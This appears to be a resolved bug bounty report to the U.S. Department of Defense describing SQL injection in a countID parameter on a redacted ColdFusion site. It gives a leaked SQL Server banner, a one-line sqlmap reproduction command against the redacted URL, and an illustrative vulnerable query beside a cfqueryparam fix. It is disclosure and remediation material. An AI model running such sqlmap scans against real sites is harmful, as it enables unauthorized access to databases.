SQL Injection on www.██████████ on countID parameter
Severity: High
Program: U.S. Dept Of Defense
Reported by: 0_1vitthal
Vulnerability Details
**Description:**
Hello Team,
I have come across a SQL injection vulnerability on www.██████ in the countID parameter. I was able to retrieve the banner, which is:
> Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64)
> Mar 19 2015 12:32:14
> Copyright (c) Microsoft Corporation
> Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
After confirming the vulnerability I stopped testing further.
**Vulnerable URL:**
https://www.███/public/saveCount.cfm?countID=4
**Steps to Reproduce:**
1. `python sqlmap.py -u https://www.██████████/public/saveCount.cfm?countID=4 --level=3 --risk=3`
**POC:**
█████████
## Impact
An attacker can take control of the database server.
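The report does not include the server-side code, so the following is an added illustration, not the site's actual source: the kind of ColdFusion query that makes a numeric `countID` parameter in a `.cfm` page injectable, beside the hardened form that validates the value and binds it with `cfqueryparam`. The table name, column names and `application.dsn` datasource are assumed.

```cfml
<!--- Vulnerable pattern (assumed, for illustration): the raw URL value is
      concatenated into the SQL text, so anything appended after the digits
      in countID=4 becomes part of the statement sent to SQL Server. --->
<cfquery name="updateCount" datasource="#application.dsn#">
    UPDATE page_counts
    SET hits = hits + 1
    WHERE countID = #url.countID#
</cfquery>

<!--- Hardened form: reject anything that is not a positive whole number,
      then bind the value as a typed parameter. cfqueryparam sends the value
      to the driver separately from the SQL text, so it cannot change the
      structure of the query regardless of its content. --->
<cfif NOT isValid("integer", url.countID) OR url.countID LTE 0>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfabort>
</cfif>
<cfquery name="updateCount" datasource="#application.dsn#">
    UPDATE page_counts
    SET hits = hits + 1
    WHERE countID = <cfqueryparam value="#url.countID#" cfsqltype="cf_sql_integer">
</cfquery>
```

The datasource login used by the page should also be restricted to the rights this single update needs, since the impact the report describes (control of the database server) depends on what an injected statement is allowed to execute as.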
Report Details
State: Closed
Substate: Resolved
Weakness: SQL Injection